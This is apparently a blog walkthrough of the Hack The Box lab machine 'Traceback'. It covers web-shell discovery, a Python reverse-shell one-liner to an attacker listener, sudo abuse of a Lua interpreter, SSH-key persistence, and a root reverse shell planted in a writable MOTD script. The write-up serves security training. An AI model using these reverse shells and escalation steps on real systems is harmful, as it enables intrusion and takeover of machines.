Pages

Search

HTB Traceback

$nmap -A -T4 -p- 10.10.10.181

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 15:08 CET
Nmap scan report for 10.10.10.181
Host is up (0.040s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.85 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.6p1 Ubuntu
  • 80/tcp open http Apache httpd 2.4.29

Access to http://10.10.10.181

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -
<body>
    <center>
        <h1>This site has been owned</h1>
        <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
        <h3> - Xh4H - </h3>
        <!--Some of the best web shells that you might need ;)-->
    </center>
</body>

Can we assume that there is a Web-shell in this box?

Let’s try to find out.

$gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/08 15:13:48 Starting gobuster
===============================================================
http://10.10.10.181/server-status (Status: 403)
===============================================================
2020/12/08 15:30:56 Finished
===============================================================

With our usual wordlist, there aren’t interesting results.

Let’s try a different one taking into account the comment of the main site that talked about web-shells…

$gobuster dir -u http://10.10.10.181 -w ~/tools/SecLists/Web-Shells/backdoor_list.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Web-Shells/backdoor_list.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/08 15:39:33 Starting gobuster
===============================================================
http://10.10.10.181/smevk.php (Status: 200)
===============================================================
2020/12/08 15:39:38 Finished
===============================================================

Using a specific wordlist for web-shells, we obtain 1 result: smevk.php

Based on the hint of: «some of the best web shells that you might need»

After searching Google we find this site: https://github.com/TheBinitGhimire/Web-Shells

Here we can find the source code of the shell.
https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php

Default credentials are: admin/admin

From this web-shell, we can obtain a reverse shell to get better access to the box.

$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

$nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.181] 43042
webadmin@traceback:/var/www/html$

Once we are inside the box, we need to enumerate what do we find.

webadmin@traceback:/var/www/html$ cd /home/webadmin
webadmin@traceback:/home/webadmin$ ls

note.txt

webadmin@traceback:/home/webadmin$ cat note.txt

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

webadmin@traceback:/home/webadmin$ cat .bash_history

ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

Let’s test what commands can the user run with sudo:

webadmin@traceback:/home/webadmin$ sudo -l

Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

User webadmin can run as sysadmin using sudo command /home/sysadmin/luvit

We can use this to try to run a system command using os.execute function from Lua (https://www.lua.org/pil/22.2.html)

...
The function os.execute runs a system command.
...

webadmin@traceback:/home/webadmin$ echo "os.execute('/bin/bash');" > lat_mov.lua

lat_mov.lua is a new Lua script that will execute bash.

webadmin@traceback:/home/webadmin$ ls -la

total 48
drwxr-x--- 5 webadmin sysadmin 4096 Dec 10 02:46 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16  2020 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27  2020 .ssh
-rw-r--r-- 1 webadmin webadmin   25 Dec 10 02:46 lat_mov.lua
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16  2020 note.txt

webadmin@traceback:/home/webadmin$ cat lat_mov.lua

os.execute('/bin/bash');

webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit ./lat_mov.lua

sysadmin@traceback:/home/webadmin$

sysadmin@traceback:~$ cat user.txt

f216XXXXXXXXXXXXXXXXXXXXXXXXXXXX

To improve our connection and make it easier we can try to create an ssh key for sysadmin and be able to connect from ssh directly.

$ssh-keygen -t rsa -f sysadmin.key

Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sysadmin.key
Your public key has been saved in sysadmin.key.pub
The key fingerprint is:
SHA256:0Iv6aGhkA1zV6gYkY+L66b+MAQq0+X2SSjgs5ANUMvU ruben@parrot
The key's randomart image is:
+---[RSA 3072]----+
| o.o...          |
|.++o.  o         |
|=o=  Eo .        |
|+oo. . o .       |
|==  o . S        |
|O.* .+.          |
|oX.*o+ .         |
|. O+ooo          |
| oo+=..          |
+----[SHA256]-----+

$ls

sysadmin.key sysadmin.key.pub

$cat sysadmin.key.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCg2lqkL9PS6ztePiGJhyYEueCLTlwULfrb3dvjshdyNFzweEGDDqAMPTEj0BcuDhIMlHsuKQGlyvyUaVAeejQ2abqwvF/OX2UelFxXKeodNnxm7GQtlr/y8hC2SNbLQYMmNiyBW9zmvvro0QfVJSna3Gdl+JS5aFaARLfK/Prw/mimBeIZ6+HzBO6Z6hM+6MA4kBIFwawQfLDs/Chx0h9hPmTbaY+iHvJYdBYW6tUKNa3p6mbKJWK/64LztUG2g/QHWnmIDQ3w1DysS4K4/Up+xyCxkxzT0ChBabI0by8dDZZ82N9z/bCJBnb4yhXYJtmUjr98fS2U2d9Qsu57AlJCQGVImk00VsuLfHVH9o9neJ/8xajPDGRiH/XgoJDTJ2xipf/DSbw+d1KBAYLZVllkPKx6jMrDoIZO+kn8eDfGxCSKt+aX0Sav7zY+P9PEWA3ICUQ1eHHhi1sqqmtPQ45/NPTiJrOGXNuEFdha9Ga6br/5wy5ZhLQh/NLCbHw1Pm8= ruben@parrot

To get this key working fine, we need to add it to the sysadmin’s authorized_keys file.

sysadmin@traceback:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCg2lqkL9PS6ztePiGJhyYEueCLTlwULfrb3dvjshdyNFzweEGDDqAMPTEj0BcuDhIMlHsuKQGlyvyUaVAeejQ2abqwvF/OX2UelFxXKeodNnxm7GQtlr/y8hC2SNbLQYMmNiyBW9zmvvro0QfVJSna3Gdl+JS5aFaARLfK/Prw/mimBeIZ6+HzBO6Z6hM+6MA4kBIFwawQfLDs/Chx0h9hPmTbaY+iHvJYdBYW6tUKNa3p6mbKJWK/64LztUG2g/QHWnmIDQ3w1DysS4K4/Up+xyCxkxzT0ChBabI0by8dDZZ82N9z/bCJBnb4yhXYJtmUjr98fS2U2d9Qsu57AlJCQGVImk00VsuLfHVH9o9neJ/8xajPDGRiH/XgoJDTJ2xipf/DSbw+d1KBAYLZVllkPKx6jMrDoIZO+kn8eDfGxCSKt+aX0Sav7zY+P9PEWA3ICUQ1eHHhi1sqqmtPQ45/NPTiJrOGXNuEFdha9Ga6br/5wy5ZhLQh/NLCbHw1Pm8=" >>/home/sysadmin/.ssh/authorized_keys

$chmod 400 sysadmin.key
$ssh -i sysadmin.key sysadmin@10.10.10.181

The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

$ whoami

sysadmin

Now, as a systemadmin we can enumerate again.
This time we can run Pspy.

Pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

sysadmin@traceback:~$ ./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
...
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/12/10 03:34:23 CMD: UID=1000 PID=999    | python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") 
2020/12/10 03:34:23 CMD: UID=1000 PID=998    | sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 
2020/12/10 03:34:23 CMD: UID=0    PID=99     | 
2020/12/10 03:34:23 CMD: UID=1000 PID=788    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=7      | 
2020/12/10 03:34:23 CMD: UID=1000 PID=563    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=562    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=561    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=560    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=56     | 
2020/12/10 03:34:23 CMD: UID=1000 PID=559    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=555    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=55     | 
2020/12/10 03:34:23 CMD: UID=0    PID=510    | /usr/sbin/sshd -D 
2020/12/10 03:34:23 CMD: UID=0    PID=51     | 
2020/12/10 03:34:23 CMD: UID=0    PID=495    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/12/10 03:34:23 CMD: UID=0    PID=49     | 
2020/12/10 03:34:23 CMD: UID=0    PID=45     | 
2020/12/10 03:34:23 CMD: UID=102  PID=440    | /usr/sbin/rsyslogd -n 
2020/12/10 03:34:23 CMD: UID=0    PID=44     | 
2020/12/10 03:34:23 CMD: UID=0    PID=438    | /usr/sbin/cron -f 
2020/12/10 03:34:23 CMD: UID=0    PID=436    | /lib/systemd/systemd-logind 
2020/12/10 03:34:23 CMD: UID=0    PID=43     | 
2020/12/10 03:34:23 CMD: UID=103  PID=412    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/12/10 03:34:23 CMD: UID=0    PID=410    | /usr/lib/accountsservice/accounts-daemon 
2020/12/10 03:34:23 CMD: UID=0    PID=41     | 
2020/12/10 03:34:23 CMD: UID=0    PID=409    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2020/12/10 03:34:23 CMD: UID=0    PID=408    | /usr/sbin/irqbalance --foreground 
2020/12/10 03:34:23 CMD: UID=0    PID=40     | 
2020/12/10 03:34:23 CMD: UID=0    PID=4      | 
2020/12/10 03:34:23 CMD: UID=0    PID=398    | /usr/bin/vmtoolsd 
2020/12/10 03:34:23 CMD: UID=101  PID=396    | /lib/systemd/systemd-resolved 
2020/12/10 03:34:23 CMD: UID=62583 PID=394   | /lib/systemd/systemd-timesyncd 
2020/12/10 03:34:23 CMD: UID=0    PID=392    | /usr/bin/VGAuthService 
2020/12/10 03:34:23 CMD: UID=0    PID=39     | 
2020/12/10 03:34:23 CMD: UID=0    PID=31     | 
2020/12/10 03:34:23 CMD: UID=100  PID=306    | /lib/systemd/systemd-networkd 
2020/12/10 03:34:23 CMD: UID=0    PID=303    | vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid 
2020/12/10 03:34:23 CMD: UID=0    PID=30     | 
2020/12/10 03:34:23 CMD: UID=0    PID=277    | 
2020/12/10 03:34:23 CMD: UID=0    PID=276    | /lib/systemd/systemd-udevd 
2020/12/10 03:34:23 CMD: UID=0    PID=27     | 
2020/12/10 03:34:23 CMD: UID=0    PID=260    | /lib/systemd/systemd-journald 
2020/12/10 03:34:23 CMD: UID=0    PID=26     | 
2020/12/10 03:34:23 CMD: UID=0    PID=18     | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1706   | ./pspy64 
2020/12/10 03:34:23 CMD: UID=0    PID=1704   | sleep 30 
2020/12/10 03:34:23 CMD: UID=0    PID=1703   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:34:23 CMD: UID=0    PID=1700   | /usr/sbin/CRON -f 
2020/12/10 03:34:23 CMD: UID=0    PID=17     | 
2020/12/10 03:34:23 CMD: UID=0    PID=1686   | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1651   | bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1627   | -sh 
2020/12/10 03:34:23 CMD: UID=1001 PID=1626   | sshd: sysadmin@pts/1 
2020/12/10 03:34:23 CMD: UID=1001 PID=1602   | (sd-pam) 
2020/12/10 03:34:23 CMD: UID=1001 PID=1601   | /lib/systemd/systemd --user 
2020/12/10 03:34:23 CMD: UID=0    PID=16     | 
2020/12/10 03:34:23 CMD: UID=0    PID=1599   | sshd: sysadmin [priv]
2020/12/10 03:34:23 CMD: UID=0    PID=15     | 
2020/12/10 03:34:23 CMD: UID=0    PID=13     | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1266   | bash -i 
2020/12/10 03:34:23 CMD: UID=0    PID=1237   | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1168   | /bin/bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1167   | sh -c /bin/bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1162   | /home/sysadmin/luvit ./lat_mov.lua 
2020/12/10 03:34:23 CMD: UID=0    PID=1161   | sudo -u sysadmin /home/sysadmin/luvit ./lat_mov.lua 
2020/12/10 03:34:23 CMD: UID=0    PID=1126   | 
2020/12/10 03:34:23 CMD: UID=0    PID=101    | 
2020/12/10 03:34:23 CMD: UID=1000 PID=1000   | /bin/bash 
2020/12/10 03:34:23 CMD: UID=0    PID=100    | 
2020/12/10 03:34:23 CMD: UID=0    PID=1      | /sbin/init noprompt 
2020/12/10 03:34:31 CMD: UID=???  PID=1719   | ???
2020/12/10 03:35:01 CMD: UID=???  PID=1725   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1724   | sleep 30 
2020/12/10 03:35:01 CMD: UID=???  PID=1723   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1722   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:35:01 CMD: UID=???  PID=1721   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1720   | /usr/sbin/CRON -f

Analyzing these results, some interesting lines are repeated.

2020/12/10 03:34:23 CMD: UID=0    PID=1703   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:35:01 CMD: UID=0    PID=1722   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:36:01 CMD: UID=0    PID=1731   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:37:01 CMD: UID=0    PID=1737   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

sysadmin@traceback:~$ ls -la /etc/update-motd.d/

total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16  2020 ..
-rwxrwxr-x  1 root sysadmin  981 Dec 10 03:49 00-header
-rwxrwxr-x  1 root sysadmin  982 Dec 10 03:49 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Dec 10 03:49 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Dec 10 03:49 80-esm
-rwxrwxr-x  1 root sysadmin  299 Dec 10 03:49 91-release-upgrade

sysadmin@traceback:/etc/update-motd.d$ cat 00-header

#!/bin/sh
#
#  00-header - create the header of the MOTD
#  Copyright (C) 2009-2010 Canonical Ltd.
#
#  Authors: Dustin Kirkland <kirkland@canonical.com>
#
#  This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\nWelcome to Xh4H land \n"

Every time sysadmin logs in, this file will be exected and then the «echo» command as root.
So, we can modify this file to obtain a root reverse shell.

We use & to background the task, so as not to block the SSH server (Without waiting for the execution of the code to finish)

sysadmin@traceback:/etc/update-motd.d$ nano 00-header

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' &

$nc -lnvp 9999

listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.181] 46640
root@traceback:/#

root@traceback:/# whoami

root

root@traceback:/# cat /root/root.txt

e7e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *